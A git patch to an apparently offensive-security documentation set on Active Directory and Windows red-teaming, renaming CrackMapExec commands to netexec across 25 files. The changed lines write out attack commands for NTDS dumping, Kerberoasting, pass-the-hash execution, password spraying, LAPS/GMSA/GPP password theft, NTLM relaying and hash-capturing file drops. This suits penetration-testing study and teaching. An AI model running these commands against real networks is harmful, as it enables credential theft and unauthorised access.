From 2c39a69994af7aca31890412cde1f26ec98807ee Mon Sep 17 00:00:00 2001
From: mpgn
Date: Fri, 29 Mar 2024 21:24:52 +0000
Subject: [PATCH] switch to nxc as cme is archived

---
 docs/active-directory/CVE/MS14-068.md | 2 +-
 docs/active-directory/CVE/NoPAC.md | 4 +--
 docs/active-directory/CVE/PrintNightmare.md | 2 +-
 docs/active-directory/CVE/ZeroLogon.md | 4 +--
 .../ad-adcs-certificate-services.md | 2 +-
 docs/active-directory/ad-adds-enumerate.md | 6 ++--
 docs/active-directory/ad-adds-groups.md | 2 +-
 docs/active-directory/ad-adds-linux.md | 4 +--
 docs/active-directory/ad-adds-ntds-dumping.md | 8 +++---
 docs/active-directory/ad-roasting-asrep.md | 6 ++--
 .../ad-roasting-kerberoasting.md | 4 +--
 docs/active-directory/hash-pass-the-hash.md | 4 +--
 docs/active-directory/internal-mitm-relay.md | 8 +++---
 docs/active-directory/internal-shares.md | 8 +++---
 .../kerberos-delegation-unconstrained.md | 4 +--
 docs/active-directory/kerberos-tickets.md | 2 +-
 docs/active-directory/pwd-comments.md | 4 +--
 .../pwd-group-policy-preferences.md | 6 ++--
 docs/active-directory/pwd-read-gmsa.md | 6 ++--
 docs/active-directory/pwd-read-laps.md | 4 +--
 docs/active-directory/pwd-spraying.md | 6 ++--
 docs/active-directory/trust-relationship.md | 4 +--
 docs/cheatsheets/miscellaneous-tricks.md | 2 +-
 .../access/windows-using-credentials.md | 28 +++++++++----------
 .../windows-privilege-escalation.md | 2 +-
 25 files changed, 66 insertions(+), 66 deletions(-)

diff --git a/docs/active-directory/CVE/MS14-068.md b/docs/active-directory/CVE/MS14-068.md
index d2f90ac..aee7f7d 100644
--- a/docs/active-directory/CVE/MS14-068.md
+++ b/docs/active-directory/CVE/MS14-068.md
@@ -22,7 +22,7 @@ This exploit require to know the user SID, you can use `rpcclient` to remotely g Convert-NameToSid high-sec-corp.localkrbtgt S-1-5-21-2941561648-383941485-1389968811-502 ``` -* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid` +* netexec: `netexec ldap DC1.lab.local -u username -p password -k --get-sid` ```bash Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 diff --git a/docs/active-directory/CVE/NoPAC.md b/docs/active-directory/CVE/NoPAC.md index 83bc4db..847f860 100644 --- a/docs/active-directory/CVE/NoPAC.md +++ b/docs/active-directory/CVE/NoPAC.md @@ -10,12 +10,12 @@ 0. Check the MachineAccountQuota of the account ```powershell - crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ + netexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ StandIn.exe --object ms-DS-MachineAccountQuota=* ``` 1. Check if the DC is vulnerable ```powershell - crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac + netexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac ``` **Exploitation** diff --git a/docs/active-directory/CVE/PrintNightmare.md b/docs/active-directory/CVE/PrintNightmare.md index 71c4251..6dc7422 100644 --- a/docs/active-directory/CVE/PrintNightmare.md +++ b/docs/active-directory/CVE/PrintNightmare.md @@ -48,7 +48,7 @@ When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: ```ps1 -cme smb -u user -p password -d domain.local -M webdav [TARGET] +nxc smb -u user -p password -d domain.local -M webdav [TARGET] ``` **Trigger the exploit**: diff --git a/docs/active-directory/CVE/ZeroLogon.md b/docs/active-directory/CVE/ZeroLogon.md index 0975bcf..cf2516b 100644 
--- a/docs/active-directory/CVE/ZeroLogon.md +++ b/docs/active-directory/CVE/ZeroLogon.md @@ -75,9 +75,9 @@ Exploit steps from the white paper lsadump::postzerologon /target:10.10.10.10 /account:DC01$ ``` -* `CrackMapExec` - only check +* `netexec` - only check ```powershell - crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon + netexec smb 10.10.10.10 -u username -p password -d domain -M zerologon ``` A 2nd approach to exploit zerologon is done by relaying authentication. diff --git a/docs/active-directory/ad-adcs-certificate-services.md b/docs/active-directory/ad-adcs-certificate-services.md index 7e54c45..b56f5a4 100644 --- a/docs/active-directory/ad-adcs-certificate-services.md +++ b/docs/active-directory/ad-adcs-certificate-services.md @@ -5,7 +5,7 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role ## ADCS Enumeration -* crackmapexec: `crackmapexec ldap domain.lab -u username -p password -M adcs` +* netexec: `netexec ldap domain.lab -u username -p password -M adcs` * ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` * certutil: `certutil.exe -config - -ping`, `certutil -dump` diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index f50f9bd..bfe8727 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md 
@@ -282,9 +282,9 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun Sometimes you need to find a machine where a specific user is logged in. You can remotely query every machines on the network to get a list of the users's sessions. -* CrackMapExec +* netexec ```ps1 - cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions + nxc smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator ``` @@ -320,7 +320,7 @@ You can remotely query every machines on the network to get a list of the users' ## References * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) -* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/) +* [Pen Testing Active Directory Environments - Part I: Introduction to netexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-netexec-powerview/) * [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/) * [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/) * [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/) diff --git a/docs/active-directory/ad-adds-groups.md b/docs/active-directory/ad-adds-groups.md index 5d66d8d..281a91e 100644 --- a/docs/active-directory/ad-adds-groups.md +++ b/docs/active-directory/ad-adds-groups.md 
@@ -9,7 +9,7 @@ If you do not want modified ACLs to be overwritten every hour, you should change Find users with `AdminCount=1`. ```ps1 -crackmapexec ldap 10.10.10.10 -u username -p password --admin-count +netexec ldap 10.10.10.10 -u username -p password --admin-count # or bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get search --filter '(admincount=1)' --attr sAMAccountName # or diff --git a/docs/active-directory/ad-adds-linux.md b/docs/active-directory/ad-adds-linux.md index 9e288af..9dae044 100644 --- a/docs/active-directory/ad-adds-linux.md +++ b/docs/active-directory/ad-adds-linux.md @@ -99,8 +99,8 @@ On macOS you can use `bifrost`. Connect to the machine using the account and the hash with CME. ```powershell -$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN" -CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 +$ netexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN" + 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 ``` diff --git a/docs/active-directory/ad-adds-ntds-dumping.md b/docs/active-directory/ad-adds-ntds-dumping.md index eb96300..223daf7 100644 --- a/docs/active-directory/ad-adds-ntds-dumping.md +++ b/docs/active-directory/ad-adds-ntds-dumping.md @@ -27,8 +27,8 @@ DCSync is a technique used by attackers to obtain sensitive information, includi ```powershell mimikatz# lsadump::dcsync /domain:htb.local /all /csv - crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds - crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi + netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds + netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi ``` > :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts. 
@@ -48,9 +48,9 @@ The VSS is a Windows service that allows users to create snapshots or backups of ```powershell ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q ``` -* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) +* [netexec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) ```powershell - cme smb 10.10.0.202 -u username -p password --ntds vss + nxc smb 10.10.0.202 -u username -p password --ntds vss ``` diff --git a/docs/active-directory/ad-roasting-asrep.md b/docs/active-directory/ad-roasting-asrep.md index 7d94d58..94b29fd 100644 --- a/docs/active-directory/ad-roasting-asrep.md +++ b/docs/active-directory/ad-roasting-asrep.md @@ -44,9 +44,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast ``` -* CrackMapExec Module +* netexec Module ```powershell - $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt + $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt LDAP 10.0.2.11 389 dc01 $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5 ``` @@ -106,7 +106,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4- ```bash user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache - user@hostname:~$ crackmapexec smb DC01.DOMAIN.LOCAL -k --shares + user@hostname:~$ netexec smb DC01.DOMAIN.LOCAL -k --shares ``` **Mitigations**: diff --git a/docs/active-directory/ad-roasting-kerberoasting.md b/docs/active-directory/ad-roasting-kerberoasting.md index 6644e85..3e63df9 100644 --- a/docs/active-directory/ad-roasting-kerberoasting.md +++ b/docs/active-directory/ad-roasting-kerberoasting.md 
@@ -18,9 +18,9 @@ Any valid domain user can request a kerberos ticket (ST) for any domain service. $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2 ``` -* CrackMapExec Module +* netexec Module ```powershell - $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt + $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt LDAP 10.0.2.11 389 dc01 [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False) LDAP 10.0.2.11 389 dc01 $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9 ``` diff --git a/docs/active-directory/hash-pass-the-hash.md b/docs/active-directory/hash-pass-the-hash.md index 5a568de..fb9877a 100644 --- a/docs/active-directory/hash-pass-the-hash.md +++ b/docs/active-directory/hash-pass-the-hash.md @@ -14,9 +14,9 @@ The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since run shell ``` -* CrackMapExec +* netexec ```powershell - cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" + nxc smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" ``` * Impacket suite ```powershell diff --git a/docs/active-directory/internal-mitm-relay.md b/docs/active-directory/internal-mitm-relay.md index b048240..c324df0 100644 --- a/docs/active-directory/internal-mitm-relay.md +++ b/docs/active-directory/internal-mitm-relay.md 
@@ -83,10 +83,10 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support - # the socks proxy can then be used with your Impacket tools or CrackMapExec + # the socks proxy can then be used with your Impacket tools or netexec $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth - $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" + $ proxychains netexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" ``` **Mitigations**: @@ -106,7 +106,7 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. ```powershell -crackmapexec smb $hosts --gen-relay-list relay.txt +netexec smb $hosts --gen-relay-list relay.txt # DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 # -d is the domain name that we filter our request on - the attacked domain @@ -239,7 +239,7 @@ secretsdump.py -k -no-pass target.lab.local * Discover WebDAV services ```ps1 webclientservicescanner 'domain.local'/'user':'password'@'machine' - crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav + netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav GetWebDAVStatus.exe 'machine' ``` * Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. 
diff --git a/docs/active-directory/internal-shares.md b/docs/active-directory/internal-shares.md index 6d072a0..de48f89 100644 --- a/docs/active-directory/internal-shares.md +++ b/docs/active-directory/internal-shares.md @@ -98,12 +98,12 @@ IconFile=\\10.10.10.10\Share\test.ico Command=ToggleDesktop ``` -Using [`crackmapexec`](https://github.com/mpgn/CrackMapExec/blob/master/cme/modules/slinky.py): +Using [`netexec`](https://github.com/Pennyw0rth/NetExec/blob/master/cme/modules/slinky.py): ```ps1 -crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf -crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk -crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP +netexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf +netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk +netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP ``` ### URL Files diff --git a/docs/active-directory/kerberos-delegation-unconstrained.md b/docs/active-directory/kerberos-delegation-unconstrained.md index 691f00e..d1a78de 100644 --- a/docs/active-directory/kerberos-delegation-unconstrained.md +++ b/docs/active-directory/kerberos-delegation-unconstrained.md @@ -41,9 +41,9 @@ Check the `TRUSTED_FOR_DELEGATION` property. grep TRUSTED_FOR_DELEGATION domain_computers.grep ``` -* [CrackMapExec module](https://github.com/mpgn/CrackMapExec/wiki) +* [netexec module](https://github.com/Pennyw0rth/NetExec/wiki) ```powershell - cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation + nxc ldap 10.10.10.10 -u username -p password --trusted-for-delegation ``` * BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` 
diff --git a/docs/active-directory/kerberos-tickets.md b/docs/active-directory/kerberos-tickets.md index d52279a..cfa8b73 100644 --- a/docs/active-directory/kerberos-tickets.md +++ b/docs/active-directory/kerberos-tickets.md @@ -25,7 +25,7 @@ There are two types of tickets in Kerberos: ## Replay Kerberos Tickets * Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\TGT_Administrator@lab.local.ccache"` -* CrackMapExec: `KRB5CCNAME=/tmp/administrator.ccache crackmapexec smb 10.10.10 -u user --use-kcache` +* netexec: `KRB5CCNAME=/tmp/administrator.ccache netexec smb 10.10.10 -u user --use-kcache` ## Convert Kerberos Tickets diff --git a/docs/active-directory/pwd-comments.md b/docs/active-directory/pwd-comments.md index da0ee19..da5273b 100644 --- a/docs/active-directory/pwd-comments.md +++ b/docs/active-directory/pwd-comments.md @@ -9,8 +9,8 @@ There are 3-4 fields that seem to be common in most Active Directory schemas: `U * Password in User Description ```powershell - crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc - crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users + netexec ldap domain.lab -u 'username' -p 'password' -M user-desc + netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users GET-DESC... 10.0.2.11 389 dc01 [+] Found following users: GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account diff --git a/docs/active-directory/pwd-group-policy-preferences.md b/docs/active-directory/pwd-group-policy-preferences.md index 4b7f061..e59e92c 100644 --- a/docs/active-directory/pwd-group-policy-preferences.md +++ b/docs/active-directory/pwd-group-policy-preferences.md 
@@ -27,10 +27,10 @@ echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aS post/windows/gather/credentials/gpp ``` -* CrackMapExec modules +* netexec modules ```powershell - cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin - cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password + nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin + nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password ``` * [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py) diff --git a/docs/active-directory/pwd-read-gmsa.md b/docs/active-directory/pwd-read-gmsa.md index 1cb386b..ec749e6 100644 --- a/docs/active-directory/pwd-read-gmsa.md +++ b/docs/active-directory/pwd-read-gmsa.md @@ -15,11 +15,11 @@ ### Extract NT hash from the Active Directory -* [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec) +* [mpgn/netexec](https://github.com/Pennyw0rth/NetExec) ```ps1 # Use --lsa to get GMSA ID - crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99 - crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....' + netexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99 + netexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....' ``` * [CravateRouge/bloodyAD](https://github.com/CravateRouge/bloodyAD) diff --git a/docs/active-directory/pwd-read-laps.md b/docs/active-directory/pwd-read-laps.md index b100569..21e5651 100644 --- a/docs/active-directory/pwd-read-laps.md +++ b/docs/active-directory/pwd-read-laps.md 
@@ -61,9 +61,9 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 ``` - * [CrackMapExec](https://github.com/mpgn/CrackMapExec): + * [netexec](https://github.com/Pennyw0rth/NetExec): ```bash - crackmapexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps + netexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps ``` * [LAPSDumper](https://github.com/n00py/LAPSDumper) diff --git a/docs/active-directory/pwd-spraying.md b/docs/active-directory/pwd-spraying.md index ebf8445..3c9b487 100644 --- a/docs/active-directory/pwd-spraying.md +++ b/docs/active-directory/pwd-spraying.md @@ -38,9 +38,9 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. ## Spray a pre-generated passwords list -* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. +* Using `netexec` and `mp64` to generate passwords and spray them against SMB services on the network. ```powershell - crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` + netexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` ``` * Using `DomainPasswordSpray` to spray a password against all users of a domain. ```powershell @@ -74,7 +74,7 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. > The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. ```powershell -$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users +$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: ``` \ No newline at end of file 
diff --git a/docs/active-directory/trust-relationship.md b/docs/active-directory/trust-relationship.md index 92fe6eb..1e8b90e 100644 --- a/docs/active-directory/trust-relationship.md +++ b/docs/active-directory/trust-relationship.md @@ -24,9 +24,9 @@ ---------- ---------- --------- -------------- domainA.local domainB.local TreeRoot Bidirectional ``` -* Crackmapexec module `enum_trusts` +* netexec module `enum_trusts` ```powershell - cme ldap -u -p -M enum_trusts + nxc ldap -u -p -M enum_trusts ``` diff --git a/docs/cheatsheets/miscellaneous-tricks.md b/docs/cheatsheets/miscellaneous-tricks.md index a781a6c..9912583 100644 --- a/docs/cheatsheets/miscellaneous-tricks.md +++ b/docs/cheatsheets/miscellaneous-tricks.md @@ -16,7 +16,7 @@ $ who $ write root pts/2 # press Ctrl+D after typing the message. ``` -## CrackMapExec Credential Database +## netexec Credential Database ```ps1 cmedb (default) > workspace create test diff --git a/docs/redteam/access/windows-using-credentials.md b/docs/redteam/access/windows-using-credentials.md index 423e3e0..2e40385 100644 --- a/docs/redteam/access/windows-using-credentials.md +++ b/docs/redteam/access/windows-using-credentials.md @@ -7,7 +7,7 @@ * [Guest Credential](#guest-credential) * [Retail Credential](#retail-credential) * [Sandbox Credential](#sandbox-credential) -* [Crackmapexec](#crackmapexec) +* [netexec](#netexec) * [Impacket](#impacket) * [PSExec](#psexec) * [WMIExec](#wmiexec) 
@@ -94,23 +94,23 @@ Username: wdagutilityaccount Password: pw123 ``` -## Crackmapexec +## netexec -Using [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec) +Using [mpgn/netexec](https://github.com/Pennyw0rth/NetExec) -* CrackMapExec supports many protocols +* netexec supports many protocols ```powershell - crackmapexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" + netexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" ``` -* CrackMapExec works with password, NT hash and Kerberos authentication +* netexec works with password, NT hash and Kerberos authentication ```powershell - crackmapexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password - crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash - export KRB5CCNAME=/tmp/kerberos/admin.ccache; crackmapexec smb 192.168.1.100 -u admin --use-kcache # Kerberos + netexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password + netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash + export KRB5CCNAME=/tmp/kerberos/admin.ccache; netexec smb 192.168.1.100 -u admin --use-kcache # Kerberos ``` 
@@ -228,7 +228,7 @@ PS C:\> netsh firewall set service remoteadmin enable PS C:\> netsh firewall set service remotedesktop enable # Alternative C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 -root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable +root@payload$ netexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable # Fix CredSSP errors reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f diff --git a/docs/redteam/escalation/windows-privilege-escalation.md b/docs/redteam/escalation/windows-privilege-escalation.md index 6075238..b8952f7 100644 --- a/docs/redteam/escalation/windows-privilege-escalation.md +++ b/docs/redteam/escalation/windows-privilege-escalation.md @@ -1446,7 +1446,7 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc ### MS17-010 (Eternal Blue) -Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. +Check the vulnerability with the following nmap script or netexec: `netexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. ```c nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010